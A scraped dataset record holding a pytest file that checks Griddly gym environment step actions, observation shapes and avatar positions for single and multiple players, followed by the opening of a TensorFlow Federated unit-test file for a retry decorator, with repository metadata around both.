] | 35 | 2020-07-22T16:43:03.000Z | 2022-03-30T19:50:20.000Z | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
] | 13 | 2020-07-22T08:24:28.000Z | 2022-01-28T06:58:38.000Z | import numpy as np
import gym
import pytest
from griddly import GymWrapperFactory, gd
@pytest.fixture
def test_name(request):
return request.node.name
def build_test_env(test_name, yaml_file):
wrapper_factory = GymWrapperFactory()
wrapper_factory.build_gym_from_yaml(
test_name,
yaml_file,
global_observer_type=gd.ObserverType.VECTOR,
player_observer_type=gd.ObserverType.VECTOR,
)
env = gym.make(f'GDY-{test_name}-v0')
env.reset()
return env
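# Note: each test builds a fresh Griddly env from a GDY YAML file. With the
# VECTOR observers used here, observations appear to be arrays of shape
# (num_object_types, grid_width, grid_height); this is an inference from the
# shape assertions below, e.g. (1, 5, 6) for a single 'avatar' object type.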
def get_object_state(env, object_name, player=1):
state = env.get_state()
    for obj in state['Objects']:
        if obj['Name'] == object_name and obj['PlayerId'] == player:
            return obj
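# Assumed shape of an entry in state['Objects'], inferred from the tests below:
#   {'Name': 'avatar', 'PlayerId': 1, 'Location': [x, y], ...}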
def test_step_SinglePlayer_SingleActionType_SingleValue(test_name):
"""
Assuming there is a single avatar
Action is in form env.step(actionId)
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == ()
assert env.action_space.n == 5
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step(1)
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert isinstance(sample, int)
def test_step_SinglePlayer_SingleActionType_ArrayValue(test_name):
"""
There is an avatar
Action is in form env.step([actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == ()
assert env.action_space.n == 5
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert isinstance(sample, int)
def test_step_SinglePlayer_SelectSource_SingleActionType(test_name):
"""
There is no avatar
env.step([x, y, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (3,)
assert np.all(env.action_space.nvec == [5, 6, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([2, 3, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert sample.shape == (3,)
def test_step_SinglePlayer_SelectSource_SingleActionType_MultipleAction(test_name):
"""
There is no avatar
Player performing multiple actions in a single step
env.step([
[x1, y1, actionId1],
[x2, y2, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert env.observation_space.shape == (2, 5, 6)
assert env.global_observation_space.shape == (2, 5, 6)
assert env.action_space.shape == (3,)
assert np.all(env.action_space.nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[2, 3, 1],
[1, 4, 3],
])
assert obs.shape == (2, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [1, 3]
assert avatar2_state['Location'] == [2, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[avatar1_id, 1, 3] == 1
    assert obs[avatar2_id, 2, 4] == 1
sample = env.action_space.sample()
assert sample.shape == (3,)
def test_step_SinglePlayer_MultipleActionType(test_name):
"""
There is an avatar
Action is in form env.step([action_type, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_MultipleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (2,)
assert np.all(env.action_space.nvec == [2, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([0, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
obs, reward, done, info = env.step([1, 3])
assert obs.shape == (1, 5, 6)
assert reward == 1
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [2, 3]
sample = env.action_space.sample()
assert sample.shape == (2,)
def test_step_SinglePlayer_SelectSource_MultipleActionType(test_name):
"""
There is no avatar
env.step([x, y, action_type, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_MultipleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (4,)
assert np.all(env.action_space.nvec == [5, 6, 2, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([2, 3, 0, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
obs, reward, done, info = env.step([1, 3, 1, 3])
assert obs.shape == (1, 5, 6)
assert reward == 1
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [2, 3]
sample = env.action_space.sample()
assert sample.shape == (4,)
def test_step_SinglePlayer_SelectSource_MultipleActionType_MultipleAction(test_name):
"""
There is no avatar
Player performing multiple actions in a single step
env.step([
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert env.observation_space.shape == (2, 5, 6)
assert env.global_observation_space.shape == (2, 5, 6)
assert env.action_space.shape == (4,)
assert np.all(env.action_space.nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[2, 3, 0, 1],
[1, 4, 0, 1]
])
assert obs.shape == (2, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [1, 3]
assert avatar2_state['Location'] == [0, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[avatar1_id, 1, 3] == 1
    assert obs[avatar2_id, 0, 4] == 1
obs, reward, done, info = env.step([
[1, 3, 1, 3],
[0, 4, 1, 3]
])
assert obs.shape == (2, 5, 6)
assert reward == 2
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [2, 3]
assert avatar2_state['Location'] == [1, 4]
sample = env.action_space.sample()
assert sample.shape == (4,)
def test_step_MultiplePlayer_SingleActionType_SingleValue(test_name):
"""
There is an avatar
Multiple players
env.step([
actionId_player1,
actionId_player2
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
1,
3,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_SingleActionType_ArrayValue(test_name):
"""
    There is no avatar, multiple players
env.step([
[actionId1],
[actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
[1],
[3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_MultipleActionType(test_name):
"""
There is an avatar
Multiple players
env.step([
[action_type, actionId_player1],
[action_type, actionId_player2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (2,)
assert np.all(env.action_space[p].nvec == [2, 5])
obs, reward, done, info = env.step([
[0, 1],
[1, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 1
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (2,)
assert sample[1].shape == (2,)
def test_step_MultiplePlayer_SelectSource_SingleActionType(test_name):
"""
    There is no avatar, multiple players, single action type
env.step([
[x1, y1, actionId1],
[x2, y2, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[1, 3, 1],
[3, 3, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType(test_name):
"""
    There is no avatar, multiple players
env.step([
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[1, 3, 0, 1],
[3, 3, 1, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 1
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SelectSource_SingleActionType_MultipleAction(test_name):
"""
    There is no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, actionId1],
[x2, y2, actionId2]
],
[ # player 2 multiple actions
[x1, y1, actionId1],
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[
[1, 3, 1],
[3, 4, 3],
],
[
[3, 3, 1],
]
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[0][avatar1_id, 0, 3] == 1
    assert obs[0][avatar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [2, 3]
assert player2_avatar2_state['Location'] == [1, 4]
    assert obs[0][avatar1_id, 2, 3] == 1
    assert obs[0][avatar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType_MultipleAction(test_name):
"""
    There is no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
],
[ # player 2 multiple actions
[x1, y1, action_type, actionId1],
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[
[1, 3, 0, 1],
[3, 4, 1, 3],
],
[
[3, 3, 0, 1],
]
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 1
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[0][avatar1_id, 0, 3] == 1
    assert obs[0][avatar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [2, 3]
assert player2_avatar2_state['Location'] == [1, 4]
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[1][avatar1_id, 2, 3] == 1
    assert obs[1][avatar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SingleActionType_SingleValue_Agent_DONE(test_name):
"""
There is an avatar
Multiple players
env.step([
actionId_player1,
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
1,
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_SingleActionType_ArrayValue_Agent_DONE(test_name):
"""
    There is no avatar, multiple players
env.step([
[actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
[1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_MultipleActionType_Agent_DONE(test_name):
"""
There is an avatar
Multiple players
env.step([
[action_type, actionId_player1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (2,)
assert np.all(env.action_space[p].nvec == [2, 5])
obs, reward, done, info = env.step([
[0, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_SelectSource_SingleActionType_Agent_DONE(test_name):
"""
    There is no avatar, multiple players, single action type
env.step([
[x1, y1, actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[1, 3, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
def test_step_MultiplePlayer_SelectSource_MultipleActionType_Agent_DONE(test_name):
"""
    There is no avatar, multiple players
env.step([
[x1, y1, action_type, actionId1],
None
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[1, 3, 0, 1],
None,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [3, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
def test_step_MultiplePlayer_SelectSource_SingleActionType_MultipleAction_Agent_DONE(test_name):
"""
    There is no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, actionId1],
[x2, y2, actionId2]
],
[ # player 2 is dead
None,
],
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (3,)
assert np.all(env.action_space[p].nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[
[1, 3, 1],
[3, 4, 3],
],
None,
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[0][avatar1_id, 0, 3] == 1
    assert obs[0][avatar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [3, 3]
assert player2_avatar2_state['Location'] == [1, 4]
    assert obs[0][avatar1_id, 3, 3] == 1
    assert obs[0][avatar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (3,)
assert sample[1].shape == (3,)
def test_step_MultiplePlayer_SelectSource_MultipleActionType_MultipleAction_Agent_DONE(test_name):
"""
    There is no avatar, multiple players
env.step([
[ # player 1 multiple actions
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
],
# player 2 is dead
None,
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (2, 5, 6)
for p in range(env.player_count):
assert env.observation_space[p].shape == (2, 5, 6)
assert env.action_space[p].shape == (4,)
assert np.all(env.action_space[p].nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[
[1, 3, 0, 1],
[3, 4, 1, 3],
],
None,
])
assert obs[0].shape == (2, 5, 6)
assert reward[0] == 1
assert obs[1].shape == (2, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar1_state = get_object_state(env, 'avatar1', player=1)
player1_avatar2_state = get_object_state(env, 'avatar2', player=1)
assert player1_avatar1_state['Location'] == [0, 3]
assert player1_avatar2_state['Location'] == [4, 4]
object_names = env.game.get_object_names()
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[0][avatar1_id, 0, 3] == 1
    assert obs[0][avatar2_id, 4, 4] == 1
player2_avatar1_state = get_object_state(env, 'avatar1', player=2)
player2_avatar2_state = get_object_state(env, 'avatar2', player=2)
assert player2_avatar1_state['Location'] == [3, 3]
assert player2_avatar2_state['Location'] == [1, 4]
    avatar1_id = object_names.index('avatar1')
    avatar2_id = object_names.index('avatar2')
    assert obs[1][avatar1_id, 3, 3] == 1
    assert obs[1][avatar2_id, 1, 4] == 1
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (4,)
assert sample[1].shape == (4,)
| 27.770718 | 98 | 0.621672 | 4,054 | 30,159 | 4.417119 | 0.02886 | 0.010164 | 0.033506 | 0.025018 | 0.973307 | 0.963031 | 0.949182 | 0.943039 | 0.937678 | 0.935277 | 0 | 0.046387 | 0.241586 | 30,159 | 1,085 | 99 | 27.796313 | 0.736502 | 0.082363 | 0 | 0.830838 | 0 | 0 | 0.086542 | 0.051383 | 0 | 0 | 0 | 0 | 0.517964 | 1 | 0.035928 | false | 0 | 0.005988 | 0.001497 | 0.046407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6fc2f8619f5a8d6afe2402115f76e3af09436fb2 | 9,463 | py | Python | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | tensorflow_federated/python/common_libs/retrying_test.py | teo-milea/federated | ce0707a954a531860eb38864b44d7b748fd62aa7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from typing import Any
from unittest import mock
from absl.testing import absltest
from tensorflow_federated.python.common_libs import retrying
class RetryingArgValidationTest(absltest.TestCase):
def test_raises_non_function(self):
with self.assertRaises(TypeError):
retrying.retry(fn=0)
def test_raises_non_function_exception_filter(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, retry_on_exception_filter=0)
def test_raises_non_function_result_filter(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, retry_on_result_filter=0)
def test_raises_complex_wait_multiplier(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, wait_multiplier=1j)
def test_raises_complex_max_wait_ms(self):
with self.assertRaises(TypeError):
retrying.retry(fn=lambda x: x, wait_max_ms=1j)
def test_raises_zero_wait_multiplier(self):
with self.assertRaises(ValueError):
retrying.retry(fn=lambda x: x, wait_multiplier=0)
def test_raises_zero_max_wait_ms(self):
with self.assertRaises(ValueError):
retrying.retry(fn=lambda x: x, wait_max_ms=0)
class CountInvocations:
def __init__(self, n_invocations_to_raise: int, error_to_raise: Exception,
return_value: Any):
self._n_invocations_to_raise = n_invocations_to_raise
self._error_to_raise = error_to_raise
self._return_value = return_value
self._n_invocations = 0
@property
def n_invocations(self):
return self._n_invocations
def __call__(self, *args, **kwargs):
del args, kwargs # Unused
self._n_invocations += 1
if self._n_invocations <= self._n_invocations_to_raise:
raise self._error_to_raise
return self._return_value
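# How the tests below use this helper (hypothetical values): a callable that
# raises `error_to_raise` for its first `n_invocations_to_raise` calls lets a
# retry decorator be observed retrying until `return_value` comes back, e.g.
#   helper = CountInvocations(2, ValueError('boom'), 'ok')
#   helper()  # raises ValueError  (invocation 1)
#   helper()  # raises ValueError  (invocation 2)
#   helper()  # returns 'ok'       (invocation 3)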
class RetryingFunctionTest(absltest.TestCase):
def test_standalone_decorator_always_retries(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
@retrying.retry
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
return_val = invoke_callable()
self.assertEqual(return_val, expected_return_val)
# Final call succeeds
self.assertEqual(count_invocations_callable.n_invocations,
expected_num_invocations + 1)
def test_error_filter_raises_wrong_error_type(self):
count_invocations_callable = CountInvocations(1, TypeError('Error'), 0)
@retrying.retry(
retry_on_exception_filter=lambda e: isinstance(e, ValueError))
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
with self.assertRaises(TypeError):
invoke_callable()
def test_error_filter_called_with_raised_err(self):
error = TypeError('error')
expected_result = 1
count_invocations_callable = CountInvocations(1, error, 1)
mock_callable = mock.MagicMock(return_value=True)
def err_filter(*args):
return mock_callable(*args)
@retrying.retry(retry_on_exception_filter=err_filter)
def invoke_callable(*args, **kwargs):
return count_invocations_callable(*args, **kwargs)
result = invoke_callable()
self.assertEqual(result, expected_result)
mock_callable.assert_called_once_with(error)
def test_result_filter_not_incur_retry(self):
expected_return_val = 0
expected_num_invocations = 3
count_invocations_callable = CountInvocations(expected_num_invocations,
TypeError('Error'),
expected_return_val)
mock_callable = mock.MagicMock(return_value=False)
